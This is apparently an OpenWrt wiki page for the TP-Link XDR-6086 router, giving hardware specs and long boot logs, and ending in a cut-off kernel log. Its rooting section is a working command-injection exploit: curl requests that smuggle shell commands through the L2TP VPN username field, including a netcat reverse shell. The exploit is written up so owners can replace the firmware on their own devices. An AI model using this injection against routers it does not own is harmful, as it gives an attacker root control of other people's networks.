TP-Link XDR-6086

Generic Router

The TP-Link XDR-6086 router supports 4 802.11ax streams on both 2.4GHz @40MHz and 5GHz @160MHz for a combined 6000Mbps wireless speed. It is based on the MediaTek MT7986A SoC.

Support Forums https://forum.openwrt.org/t/adding-support-for-tp-link-xdr-6086

In-depth review https://www.acwifi.net/21922.html

CPU Ram Flash Network WLAN 2.4G. WLAN 5G USB Serial JTag
MT7986A @ 2.0 GHz 512 MiB 128 MiB 1x 1G, 2x 2.5G b/g/n/ax a/n/ac/ax 1x 3.0 Yes ?

Because TP-Link has restricted the bootloader significantly, a bootloader replacement is necessary to to get OpenWrt running on the device. This preserves the OEM ART calibration data partition and factory_boot partition that contains the device's MAC address.

Thanks to a root exploit from @JamesLucas, this has been made possible without opening the device.

Optional Requirements:

  • Having a FAT32-formatted USB stick is highly encouraged to install netcat as the BusyBox version is very limited. This guide uses a USB stick to accomplish rooting the device and getting a somewhat-interactive shell.

To root the device, log into the router's web GUI and open your inspector/page editor. You'll find your authentication token <html>stok</html> in the request URL. It'll look something like <html>stok=<your token>/ds</html>.

Next, navigate to the VPN tab and create an L2TP server. Disable encryption to make setup quicker. Settings do not matter as long as they are valid to create a dummy server.

On your PC, curl can be used to speed up the process. The skeleton command looks like this:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";<command>","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

The <html>command</html> parameter should be replaced with whichever shell command you wish to run, and the <html>stok</html> variable should be replaced with the value retrieved using your web inspector/editor.

On your FAT32 formatted USB stick, download netcat and plug it in. If this is your first time plugging it in, then it will be at <html>/dev/sda1</html> and will increment for each time it is unplugged and replugged until rebooted.

NOTE: Each time we run one of the following commands, a new user on the L2TP server will be created. The shell injection is triggered when the user is disabled. To create a new command, the previous L2TP user should be deleted. This could probably be done with a curl command too, feel free to update.

NOTE: For some commands, a netcat listener could be used to verify if the step was successful. <html>nc -nlvp 4444</html>

Mounting the USB Stick

Create mount point:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";mkdir /tmp/usb &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Check the mount point (using netcat listener on port 4444, check your IP);

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";ls -la /tmp | nc 192.168.1.100 4444 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

If successful, you should see a directory <html>usb</html> has been created.

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Mount the USB stick:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";mount -t vfat /dev/sda1 /tmp/usb &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Check if it mounted; you'll see the netcat .ipk if it worked:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";ls -la /tmp/usb | nc 192.168.1.100 4444 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Install netcat

Install netcat (be sure to check the name of your ipk matches):

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";opkg install /tmp/usb/netcat.ipk &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Get a root shell

Now, let's get a root shell (you need your netcat listener on your PC for this):

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";netcat -e /bin/sh 192.168.1.100 4444 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Architecture ARM
Vendor MediaTek
Bootloader TF-A + U-Boot
System-On-Chip MT7986
CPU/Speed 2.0 GHz
Flash-Chip ESMT F50L1G41LB
Flash size 128 MiB
RAM 512 MiB
Wireless MT7986GN 2.4GHz 802.11bgnax
Ethernet 10/100/1000/2500 Mbit/s w/ vlan support
Switch MediaTek MT7531A
USB 1x 3.0
Serial Yes
JTAG Unknown

Insert photo of front of the casing

Insert photo of back of the casing

Insert photo of backside label

Insert photo of PCB

FIXME Describe what needs to be done to open the device, e.g. remove rubber feet, adhesive labels, screws, ...

port.serial general information about the serial port, serial port cable, etc.

How to connect to the Serial Port of this specific device:
Insert photo of PCB with markings for serial port

FIXME Replace EXAMPLE by real values.

Serial connection parameters
for TP-Link XDR-6086 @@Version@@
EXAMPLE 115200, 8N1, 3.3V

port.jtag general information about the JTAG port, JTAG cable, etc.

How to connect to the JTAG Port of this specific device:
Insert photo of PCB with markings for JTAG port

F0: 102B 0000 FA: 1040 0000 FA: 1040 0000 [0200] F9: 0000 0000 V0: 0000 0000 [0001] 00: 0000 0000 BP: 2400 0041 [0000] G0: 1190 0000 EC: 0000 0000 [1000] T0: 0000 0142 [010F] Jump to BL NOTICE: BL2: v2.6(release):220705_xdr6088mtv1-canoe_r17-dirty NOTICE: BL2: Built : 07:05:56, Jul 4 2022 NOTICE: WDT: disabled rtl8221 reset pull down by gpio13 rtl8221 reset pull down by gpio17 NOTICE: EMI: Using DDR3 settings NOTICE: EMI: Detected DRAM size: 512MB NOTICE: EMI: complex R/W mem test passed NOTICE: SPI_NAND parses attributes from parameter page. NOTICE: SPI_NAND Detected ID 0x35 NOTICE: Page size 2048, Block size 131072, size 134217728 NOTICE: BL2: Booting BL31 NOTICE: BL31: v2.6(release):220705_xdr6088mtv1-canoe_r17-dirty NOTICE: BL31: Built : 07:05:56, Jul 4 2022 U-Boot 2022.04-rc1 (Jul 04 2022 - 07:05:56 +0000) CPU: MediaTek MT7986 Model: mt7986-rfb DRAM: 512 MiB Core: 42 devices, 15 uclasses, devicetree: embed MMC: mmc@11230000: 0 Loading Environment from MTD... spi-nand: spi_nand spi_nand@1: GigaDevice SPI NAND was found. spi-nand: spi_nand spi_nand@1: 128 MiB, block size: 128 KiB, page size: 2048, OOB size: 64 *** Warning - bad CRC, using default environment In: serial@11002000 Out: serial@11002000 Err: serial@11002000 Use slp to stop autoboot: 500ms 'spi-nand0' is now active device Reading from 0x4c0000 to 0x4c00cf, size 0xd0 ... Succeeded verifying partition... Reading from 0x3c0000 to 0x3fffff, size 0x40000 ... Succeeded ok verifying partition... Reading from 0x520000 to 0xb9ffff, size 0x680000 ... Succeeded Reading from 0xc60000 to 0x445ffff, size 0x3800000 ... Succeeded ok Reading from 0x4c0000 to 0x4dffff, size 0x20000 ... Succeeded Reading from 0x3c0000 to 0x3fffff, size 0x40000 ... Succeeded boot image at 41000000 U-Boot 2022.04-rc1 (Jul 04 2022 - 07:05:56 +0000) CPU: MediaTek MT7986 Model: mt7986-rfb DRAM: 512 MiB Core: 42 devices, 15 uclasses, devicetree: embed MMC: mmc@11230000: 0 Loading Environment from MTD... spi-nand: spi_nand spi_nand@1: GigaDevice SPI NAND was found. spi-nand: spi_nand spi_nand@1: 128 MiB, block size: 128 KiB, page size: 2048, OOB size: 64 *** Warning - bad CRC, using default environment In: serial@11002000 Out: serial@11002000 Err: serial@11002000 'spi-nand0' is now active device Reading from 0x4c0000 to 0x4dffff, size 0x20000 ... Succeeded Reading from 0x520000 to 0xc1ffff, size 0x700000 ... Succeeded ## Loading kernel from FIT Image at 46000000 ... Using 'config-1' configuration Trying 'kernel-1' kernel subimage Description: ARM64 OpenWrt Linux-5.4.168 Type: Kernel Image Compression: lzma compressed Data Start: 0x460000e8 Data Size: 4447404 Bytes = 4.2 MiB Architecture: AArch64 OS: Linux Load Address: 0x44080000 Entry Point: 0x44080000 Hash algo: crc32 Hash value: c34bda4d Hash algo: sha1 Hash value: 9bbdeadb4f276b60a5b277f1f1c8b09e0e02d3f9 ## Loading fdt from FIT Image at 46000000 ... Using 'config-1' configuration Trying 'fdt-1' fdt subimage Description: ARM64 OpenWrt xdr6086mtv1 device tree blob Type: Flat Device Tree Compression: uncompressed Data Start: 0x4643ded0 Data Size: 21160 Bytes = 20.7 KiB Architecture: AArch64 Hash algo: crc32 Hash value: 84ef023b Hash algo: sha1 Hash value: 707dca22fb85c0f7de179ddae4c73968f9b5c2ef Booting using the fdt blob at 0x4643ded0 Uncompressing Kernel Image Loading Device Tree to 000000005f7f0000, end 000000005f7f82a7 ... OK Starting kernel ... - preinit - - regular preinit - switching to jffs2 - init - Please press Enter to activate this console. /etc/rc.common: line 104: config_load: not found /etc/rc.common: line 104: config_foreach: not found /etc/rc.common: line 104: config_foreach: not found /etc/rc.common: line 104: config_foreach: not found /etc/rc.common: line 87: config_load: not found /etc/rc.common: line 87: config_get: not found grep: /tmp/nas_data: No such file or directory grep: /tmp/nas_data: No such file or directory grep: /tmp/nas_data: No such file or directory grep: /tmp/nas_data: No such file or directory grep: /tmp/nas_data: No such file or directory sh: out of range sh: out of range mcbAlignFromPool(235). Fail to alloc 552000 bytes from mcb Generic, alloc from heap [<0x7f833c7020>]. mcbAlignFromPool(235). Fail to alloc 883200 bytes from mcb Generic, alloc from heap [<0x7f83376020>]. mcbAlignFromPool(235). Fail to alloc 1214400 bytes from mcb Generic, alloc from heap [<0x7f83325020>]. grep: /tmp/nas_data: No such file or directory sh: out of range /etc/rc.common: .: line 6: can't open '/lib/pppox/pppox-default-variables.sh' /etc/rc.common: line 87: config_load: not found /etc/rc.common: line 87: config_get: not found <ucconv> usrconfPathPrepare(38). /tmp/etc/config doesn't exit, Now create it. systemLoadSysmode(753). get workform 0 systemLoadSysmode(761). get mngt_mode 3, work_mode 0, controller_detect_mode 0 initGmacPortInfo(304). gmac0 include port0, support switch initGmacPortInfo(304). gmac0 include port1, support switch initGmacPortInfo(304). gmac0 include port2, support switch initGmacPortInfo(304). gmac0 include port3, support switch initGmacPortInfo(304). gmac0 include port4, support switch initGmacPortInfo(304). gmac1 include port5, no support switch ### dhcp event command register. ### ### dhcpv6 event command register. ### checkOrResetFactoryInfo(988). Factory Info verified statsService init .[relay_mode_config_notify:42] sysModeGetWorkMode: 4 [relay_mode_config_notify:42] sysModeGetWorkMode: 4 [wanPortDetectCheckAllLan:113] sysModeGetWorkMode: 4 deviceInfoInit(975). softver:1.0.5 Build 220809 Rel.49402 [wireless]priv_cmd_table_get[208]invalid priv cmd table [wireless]driver_if_init[289]error code is: -1 [wireless]driver_if_init[290]get iwpriv cmd table failed! ioctl[iwpriv ra0 set setMacAddr=F4:84:8D:6D:2C:31] failed Network is down ioctl[iwpriv rax0 set setMacAddr=F4:84:8D:6D:2C:33] failed No such device br_scan_ifaces(47). Scanning bridge netif... topology_init_self_device(4554). init mesh group id: [00:00:00:00:00:00] autoconf_business_init(2064). init wlan_dev_num:0 autoconf_business_init(2064). init wlan_dev_num:1 init wss module. event_sock_enable(1195). enabled netlink socket at 23 with own pid 1361 jsonObjectToFile(290). Trying to commit to flash... portManageLoadConfigToDevWithMode(4854). load config to dev f4:84:8d:6d:2c:31 loadIptvConfigToDev(3561). cap sub func 3c loadIptvConfigToDev(3568). load iptv to dev f4:84:8d:6d:2c:31 [portManageInit:6273] sysModeGetWorkMode: 4 optimizeOneFile(1054). Rules Optimized: 619 optimizeOneFile(1055). Rules Unoptimized: 43 [<cloud_relay_client/dms>:<cloud_relay_client/iccCtl()/465>] local->1/1024, cmd 0x40004926, sendlen 4, iccctl_ret 0 [<cloud_relay_client/dms>:<cloud_relay_client/iccCtl()/465>] local->1/1024, cmd 0x40004921, sendlen 16, iccctl_ret 0 lanv6LocalIpv6: :: system_set_if_ip_v6: add ip:fd00:f484:8d6d:2c31:f684:8dff:fe6d:2c31/64 to if:br-lan dnsProxyParamInit(196). priDnsStr = 223.6.6.6,223.6.6.6, sndDnsStr = 0.0.0.0,0.0.0.0 dnsProxyParamInit(238). priDns6Str = 240c::6666,240c::6666, sndDns6Str = ::,:: dnsProxyParamInit(196). priDnsStr = 223.6.6.6,223.6.6.6, sndDnsStr = 0.0.0.0,0.0.0.0 dnsProxyParamInit(238). priDns6Str = 240c::6666,240c::6666, sndDns6Str = ::,:: [lanDhcpcInit:1676] sysModeGetWorkMode: 4 [dhcpsParamsUpdate:1328] sysModeGetWorkMode: 4 1 2 1 2 firewallCtxInit(560). /network/wan_status/wan_status firewallCtxInit(560). /network/wan_status_2/wan_status_2 updateChainInputIcmpToWanIf(222). enter icmp to wanif ip6tables: No chain/target/match by that name. <WARN> ipt cmd failed: ip6tables -w -t filter -F INPUT_VPN, 256 ip6tables: No chain/target/match by that name. <WARN> ipt cmd failed: ip6tables -w -t filter -F FORWARD_VPN, 256 ip6tables: No chain/target/match by that name. <WARN> ipt cmd failed: ip6tables -w -t nat -F POSTROUTING_VPN, 256 statsService start. ===============DHCP_TIMEOUT=30 [wanStartIndex:4850] sysModeGetWorkMode: 4 [wanPortDetectCheckAllLan:113] sysModeGetWorkMode: 4 [miniUPnPStart:831] sysModeGetWorkMode: 4 [upnpdStart:1448] sysModeGetWorkMode: 4 ioctl[iwpriv ra0 set Workform=0] failed Invalid argument ioctl[iwpriv rax0 set Workform=0] failed Invalid argument [wireless]wlan_ioctl_set_allow_probereq_event[2635]wlan_ioctl_set_allow_probereq_event not implemented in mtk!! [wireless]wlan_ioctl_set_allow_probereq_event[2635]wlan_ioctl_set_allow_probereq_event not implemented in mtk!! ioctl[iwpriv ra0 set SetAlmac=F4:84:8D:6D:2C:31] failed Invalid argument [wireless]ioctlCmdSetAlmac[1052]Set almac f4:84:8d:6d:2c:31 ioctl[iwpriv rax0 set SetAlmac=F4:84:8D:6D:2C:31] failed Invalid argument [wireless]ioctlCmdSetAlmac[1052]Set almac f4:84:8d:6d:2c:31 [wireless]ioctl_wlanSetMapdRole[1082]map_role:0 cloudNmsModuleConfigVersionInit(4384). Read Module:wireless SubModule:wlan_host_2g version failed! cloudNmsModuleConfigVersionInit(4384). Read Module:wireless SubModule:wlan_host_5g version failed! cloudNmsModuleConfigVersionInit(4384). Read Module:wireless SubModule:wlan_bs version failed! mesh_set_cap_info(139). set wan status 0, CAP AL MAC 00:00:00:00:00:00 netif_port_update_handle(962). all set 1905 enable ps_app_init 2074 Path selection app init... Init User_Flush_Fcache [error] WRITE FILE ERRORwxx maxDownloadSpeed 0, maxUploadSpeed 0 rmmod: can't unload 'br_guest_filter': unknown symbol in module, or unknown parameter [wdsSetConfigRouter:658] sysModeGetWorkMode: 4 [wdsSetConfigRouter:658] sysModeGetWorkMode: 4 [wiredExtStart:686] sysModeGetWorkMode: 4 -->[ERROR]packetHandler | 778 - LLDP select error!!! taskCheckPending(359). TASK cloudBrd finished pending and continue. taskCheckPending(359). TASK tWlanTask finished pending and continue. taskBootupPending(350). TASK timerMgt finished pending and continue. taskCheckPending(359). TASK inetd finished pending and continue. taskCheckPending(359). TASK monitor finished pending and continue. [cloudLinkHandleIfname:215] sysModeGetWorkMode: 4 [cloudLinkHandleDnsServerIp:171] sysModeGetWorkMode: 4 station_disassociate_all_event_callback(1920). <ERROR> cannot find ra0 in topology db station_disassociate_all_event_callback(1920). <ERROR> cannot find ra0 in topology db station_disassociate_all_event_callback(1920). <ERROR> cannot find ra1 in topology db station_disassociate_all_event_callback(1920). <ERROR> cannot find ra1 in topology db station_disassociate_all_event_callback(1920). <ERROR> cannot find ra7 in topology db role_switch_handle_wan_detect_event(522). detect wan status 0, self_wan_status 0, cap_wan_status 0 role_switch_handle_wan_detect_event(529). detect wan status: port[-1] internet[0] state[0] station_disassociate_all_event_callback(1920). <ERROR> cannot find ra7 in topology db ioctl[iwpriv ra0 set Channel=0] failed Invalid argument ioctl[iwpriv ra0 set BeaconPeriod=0] failed Invalid argument station_disassociate_all_event_callback(1920). <ERROR> cannot find ra0 in topology db ioctl[iwpriv ra0 set DtimPeriod=0] failed Invalid argument station_disassociate_all_event_callback(1920). <ERROR> cannot find ra0 in topology db system_bridge_delif(890). Sys del bridge if failed:Invalid argument station_disassociate_all_event_callback(1920). <ERROR> cannot find ra1 in topology db ioctl[iwpriv ra1 set DtimPeriod=0] failed Invalid argument station_disassociate_all_event_callback(1920). <ERROR> cannot find ra7 in topology db ioctl[iwpriv ra7 set DtimPeriod=0] failed Invalid argument station_disassociate_all_event_callback(1920). <ERROR> cannot find ra7 in topology db station_disassociate_all_event_callback(1920). <ERROR> cannot find rax0 in topology db station_disassociate_all_event_callback(1920). <ERROR> cannot find rax0 in topology db station_disassociate_all_event_callback(1920). <ERROR> cannot find rax7 in topology db station_disassociate_all_event_callback(1920). <ERROR> cannot find rax7 in topology db ioctl[iwpriv rax0 set Channel=0] failed Invalid argument ioctl[iwpriv rax0 set BeaconPeriod=0] failed Invalid argument station_disassociate_all_event_callback(1920). <ERROR> cannot find rax0 in topology db ioctl[iwpriv rax0 set DtimPeriod=0] failed Invalid argument ioctl[iwpriv rax0 set MgntFrameRate=0] failed Invalid argument station_disassociate_all_event_callback(1920). <ERROR> cannot find rax0 in topology db station_disassociate_all_event_callback(1920). <ERROR> cannot find rax7 in topology db ioctl[iwpriv rax7 set DtimPeriod=0] failed Invalid argument ioctl[iwpriv rax7 set MgntFrameRate=0] failed Invalid argument station_disassociate_all_event_callback(1920). <ERROR> cannot find rax7 in topology db [wireless]wlan_ioctl_set_allow_probereq_event[2635]wlan_ioctl_set_allow_probereq_event not implemented in mtk!! [wireless]wlan_ioctl_set_allow_probereq_event[2635]wlan_ioctl_set_allow_probereq_event not implemented in mtk!! fsLoadFinishCallback(132). JFFS LOAD: Exec file migration. ctrlLoadFinishCallback(1160). Exec smp.sh. br_scan_ifaces(47). Scanning bridge netif... topology_update_local_iface(4338). == Iface vir-eth0.1 already exist... topology_update_local_iface(4338). == Iface vir-eth0.2 already exist... topology_update_local_iface(4338). == Iface vir-eth0.3 already exist... topology_update_local_iface(4338). == Ifac[ 33.601232] 7986@C08L1ra7,UpdateBeaconHandler() 2060: wdev(1) bss not ready (state:0, caller:meshImple_UpdateFhBeacon+0x74/0xa0 [mt7986b])!! e vir-eth0.4 alr[ 33.614423] [MESH]set almac to f4:84:8d:6d:2c:31 eady exist... topology_update_local_iface(4338). == Iface vir-eth0.5 already exist... topology_update_local_iface(4338). == Iface vir-eth1 already exist... topology_update_local_iface(4342). ++ Iface bond0 add to self device... topology_update_local_iface(4332). ** Iface ra5 with zero mac ignored... topology_update_local_iface(4332). ** Iface ra3 with zero mac ignored... topology_update_local_iface(4332). ** Iface ra2 with zero mac ignored... topology_update_local_iface(4332). ** Iface ra4 with zero mac ignored... topology_update_local_iface(4332). ** Iface rax3 with zero mac ignored... topology_update_local_iface(4342). ++ Iface rax7 add to self device... topology_update_local_iface(4342). ++ Iface ra7 add to self device... topology_update_local_iface(4332). ** Iface rax2 with zero mac ignored... topology_update_local_iface(4332). ** Iface ra6 with zero mac ignored... topology_update_local_iface(4332). ** Iface rax4 with zero mac ignored... topology_update_local_iface(4342). ++ Iface apcli0 add to self device... topology_update_local_iface(4342). ++ Iface apclix0 add to self device... topology_update_local_iface(4342). ++ Iface rax0 add to self device... topology_update_local_iface(4332). ** Iface rax6 with zero mac ignored... topology_update_local_iface(4342). ++ Iface ra1 add to self device... topology_update_local_iface(4332). ** Iface rax5 with zero mac ignored... topology_update_local_iface(4332). ** Iface rax1 with zero mac ignored... topology_update_local_iface(4342). ++ Iface ra0 add to self device... mwifi_channel_update_handle(755). MWi-Fi Channel update handle: radio band:0 channel switch from channel:0 to 1 mwifi_channel_update_handle(755). MWi-Fi Channel update handle: radio band:1 channel switch from channel:0 to 40 mesh_allow_ext_on_band(2136). [mapd] allow RE with almac f4:84:8d:6d:2c:31 to access band 0 mesh_allow_ext_on_band(2136). [mapd] allow RE with almac f4:84:8d:6d:2c:31 to access band 1 STEER Config(valid 1): enable: 1 ssid[2G] : TP-LINK_2C31 ssid[5G] : TP-LINK_2C31 topology status: StandAlone Module: enable: 1 chan_util_interval: 30 chan_util_samples: 6 chan_util_overload_2g: 70 chan_util_overload_5g: 90 rssi_5g_prefer_2g: 42 rssi_5g_prefer_5g: 12 rssi_low_2g: 0 rssi_high_2g: 35 rssi_high_2g_direct_btm: 42 rssi_low_5g_direct_btm: 8 rssi_low_5g: 8 rssi_high_5g: 255 rate_low_2g: 10 rate_high_2g: 20 rate_low_5g: 70 rate_high_5g: 100 timeout_bcnrpt: 2 retry_bcnrpt: 1 timeout_btm: 1 retry_btm: 5 phyrate_scaling_2g: 70 phyrate_scaling_5g: 70 band_hide_enable: 1 band_hide_rssi_2g: 255 band_hide_rssi_5g: 20 Presteer: enable: 1 auth_rej_max: 2 timeout: 15 blackout: 600 assoc_thres: 0 diff_thres: 0 Poststeer: enable: 1 node_inact_interval: 10 blackout_legacy: 600 blackout_btm: 60 timeout_idle_legacy: 15 auth_rej_max: 2 APsteer: enable: 1 auth_rej_max: 2 timeout_notify: 2 retry_notify: 5 timeout_requested: 60 aps_remote_timeout: 10 blackout: 60 rssi_low_2g_first: 30 rssi_low_2g_second: 20 rssi_low_2g_third: 10 rssi_low_5g_first: 25 rssi_low_5g_second: 15 rssi_low_5g_third: 8 Offload: enable: 1 blackout: 60 cap_primary_band: 1 re_primary_band: 1 trigger_delta_num: 5 trigger_interval: 1 start wss module. Start wlan smart steer as g_wss_topology_status 0 Standalone. Start wlan smart steer as g_wss_topology_status 0 Standalone. _wlan_ioctl_set_bs_enable enable ra0 _wlan_ioctl_set_bs_enable enable rax0 onboarding_ioctl_priv_ext(154). ioctl[ra7:0x88A9] request failed Invalid argument. mwifi_wlan_ready_event_handle(576). MWi-Fi start at wlan ready Recieved dup pkt siwtch Dup pkt switch off Recieved dup pkt siwtch role_selection_wlan_ready_handle(742). [role selection] no need to scan better ap for RE/unpaired device, return [cloudLinkHandleIfname:215] sysModeGetWorkMode: 4 [cloudLinkHandleDnsServerIp:171] sysModeGetWorkMode: 4 pair_probe_start(2053). start factory RE scan!!! lan_business_handle_wan_detect_result(2441). [lan business] Get wan status: port[-1] internet[0] state[0] role_switch_handle_wan_detect_event(522). detect wan status 0, self_wan_status 0, cap_wan_status 0 role_switch_handle_wan_detect_event(529). detect wan status: port[-1] internet[0] state[0] [cloudLinkHandleIfname:215] sysModeGetWorkMode: 4 [cloudLinkHandleDnsServerIp:171] sysModeGetWorkMode: 4 [cloudLinkHandleIfname:215] sysModeGetWorkMode: 4 [cloudLinkHandleDnsServerIp:171] sysModeGetWorkMode: 4


[ 0.000000] Booting Linux on physical CPU 0x0000000000 [0x410fd034] [ 0.000000] Linux version 5.4.168 (jenkins@wlcilnx5) (gcc version 8.4.0 (OpenWrt GCC 8.4.0 r0-e6ec08ddf)) #1 SMP Tue Aug 9 14:32:18 UTC 2022 [ 0.000000] Machine model: MediaTek MT7986a RFB [ 0.000000] earlycon: uart8250 at MMIO32 0x0000000011002000 (options '') [ 0.000000] printk: bootconsole [uart8250] enabled [ 0.000000] On node 0 totalpages: 130064 [ 0.000000] DMA32 zone: 2048 pages used for memmap [ 0.000000] DMA32 zone: 0 pages reserved [ 0.000000] DMA32 zone: 130064 pages, LIFO batch:31 [ 0.000000] psci: probing for conduit method from DT. [ 0.000000] psci: PSCIv1.1 detected in firmware. [ 0.000000] psci: Using standard PSCI v0.2 function IDs [ 0.000000] psci: MIGRATE_INFO_TYPE not supported. [ 0.000000] psci: SMC Calling Convention v1.0 [ 0.000000] percpu: Embedded 20 pages/cpu s44120 r8192 d29608 u81920 [ 0.000000] pcpu-alloc: s44120 r8192 d29608 u81920 alloc=20*4096 [ 0.000000] pcpu-alloc: [0] 0 [0] 1 [0] 2 [0] 3 [ 0.000000] Detected VIPT I-cache on CPU0 [ 0.000000] CPU features: detected: GIC system register CPU interface [ 0.000000] CPU features: kernel page table isolation disabled by kernel configuration [ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 128016 [ 0.000000] Kernel command line: console=ttyS0,115200n8 loglevel=0 swiotlb=512 root=/dev/mtdblock6 rootfstype=squashfs ubi.mtd=7 ubi.mtd=3 noinitrd earlycon=uart8250,mmio32,0x11002000 [ 0.000000] Dentry cache hash table entries: 65536 (order: 7, 524288 bytes, linear) [ 0.000000] Inode-cache hash table entries: 32768 (order: 6, 262144 bytes, linear) [ 0.000000] mem auto-init: stack:off, heap alloc:off, heap free:off [ 0.000000] Memory: 489820K/520256K available (9022K kernel code, 786K rwdata, 2704K rodata, 512K init, 6983K bss, 30436K reserved, 0K cma-reserved) [ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=4, Nodes=1 [ 0.000000] rcu: Hierarchical RCU implementation. [ 0.000000] rcu: CONFIG_RCU_FANOUT set to non-default value of 32. [ 0.000000] rcu: RCU calculated value of scheduler-enlistment delay is 25 jiffies. [ 0.000000] NR_IRQS: 64, nr_irqs: 64, preallocated irqs: 0 [ 0.000000] GICv3: GIC: Using split EOI/Deactivate mode [ 0.000000] GICv3: 640 SPIs implemented [ 0.000000] GICv3: 0 Extended SPIs implemented [ 0.000000] GICv3: Distributor has no Range Selector support [ 0.000000] GICv3: 16 PPIs implemented [ 0.000000] GICv3: no VLPI support, no direct LPI support [ 0.000000] GICv3: CPU0: found redistributor 0 region 0:0x000000000c080000 [ 0.000000] random: get_random_bytes called from start_kernel+0x2d4/0x528 with crng_init=0 [ 0.000000] arch_timer: cp15 timer(s) running at 13.00MHz (phys). [ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x2ff89eacb, max_idle_ns: 440795202429 ns [ 0.000002] sched_clock: 56 bits at 13MHz, resolution 76ns, wraps every 4398046511101ns [ 0.000104] Calibrating delay loop (skipped), value calculated using timer frequency.. 26.00 BogoMIPS (lpj=52000) [ 0.000107] pid_max: default: 32768 minimum: 301 [ 0.000172] Mount-cache hash table entries: 1024 (order: 1, 8192 bytes, linear) [ 0.000177] Mountpoint-cache hash table entries: 1024 (order: 1, 8192 bytes, linear) [ 0.000874] ASID allocator initialised with 65536 entries [ 0.000909] rcu: Hierarchical SRCU implementation. [ 0.001880] smp: Bringing up secondary CPUs ... [ 0.002092] Detected VIPT I-cache on CPU1 [ 0.002108] GICv3: CPU1: found redistributor 1 region 0:0x000000000c0a0000 [ 0.002127] CPU1: Booted secondary processor 0x0000000001 [0x410fd034] [ 0.002339] Detected VIPT I-cache on CPU2 [ 0.002347] GICv3: CPU2: found redistributor 2 region 0:0x000000000c0c0000 [ 0.002355] CPU2: Booted secondary processor 0x0000000002 [0x410fd034] [ 0.002545] Detected VIPT I-cache on CPU3 [ 0.002552] GICv3: CPU3: found redistributor 3 region 0:0x000000000c0e0000 [ 0.002559] CPU3: Booted secondary processor 0x0000000003 [0x410fd034] [ 0.002586] smp: Brought up 1 node, 4 CPUs [ 0.002588] SMP: Total of 4 processors activated. [ 0.002590] CPU features: detected: 32-bit EL0 Support [ 0.002592] CPU features: detected: CRC32 instructions [ 0.002674] CPU: All CPU(s) started at EL2 [ 0.002682] alternatives: patching kernel code [ 0.003069] devtmpfs: initialized [ 0.004763] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns [ 0.004774] futex hash table entries: 1024 (order: 4, 65536 bytes, linear) [ 0.004868] pinctrl core: initialized pinctrl subsystem [ 0.005257] NET: Registered protocol family 16 [ 0.005449] DMA: preallocated 256 KiB pool for atomic allocations [ 0.015196] SCSI subsystem initialized [ 0.015281] libata version 3.00 loaded. [ 0.015430] usbcore: registered new interface driver usbfs [ 0.015451] usbcore: registered new interface driver hub [ 0.015472] usbcore: registered new device driver usb [ 0.016079] Bluetooth: Core ver 2.22 [ 0.016100] NET: Registered protocol family 31 [ 0.016101] Bluetooth: HCI device and connection manager initialized [ 0.016111] Bluetooth: HCI socket layer initialized [ 0.016114] Bluetooth: L2CAP socket layer initialized [ 0.016121] Bluetooth: SCO socket layer initialized [ 0.016811] rbus 18000000.wbsys: PCI host bridge to bus 0000:00 [ 0.016816] pci_bus 0000:00: root bus resource [mem 0x18000000-0x18ffffff] [ 0.016822] pci_bus 0000:00: root bus resource [bus 00-ff] [ 0.016826] pci_bus 0000:00: scanning bus [ 0.016839] pci 0000:00:00.0: [14c3:7986] type 00 class 0x000280 [ 0.016848] pci 0000:00:00.0: reg 0x10: [mem 0x18000000-0x1800000f 64bit] [ 0.016852] pci 0000:00:00.0: reg 0x18: [mem 0x00000000-0x0000000f] [ 0.016855] pci 0000:00:00.0: reg 0x1c: [mem 0x00000000-0x0000000f] [ 0.016858] pci 0000:00:00.0: reg 0x20: [mem 0x00000000-0x0000000f] [ 0.016861] pci 0000:00:00.0: reg 0x24: [mem 0x00000000-0x0000000f] [ 0.017556] pci_bus 0000:00: 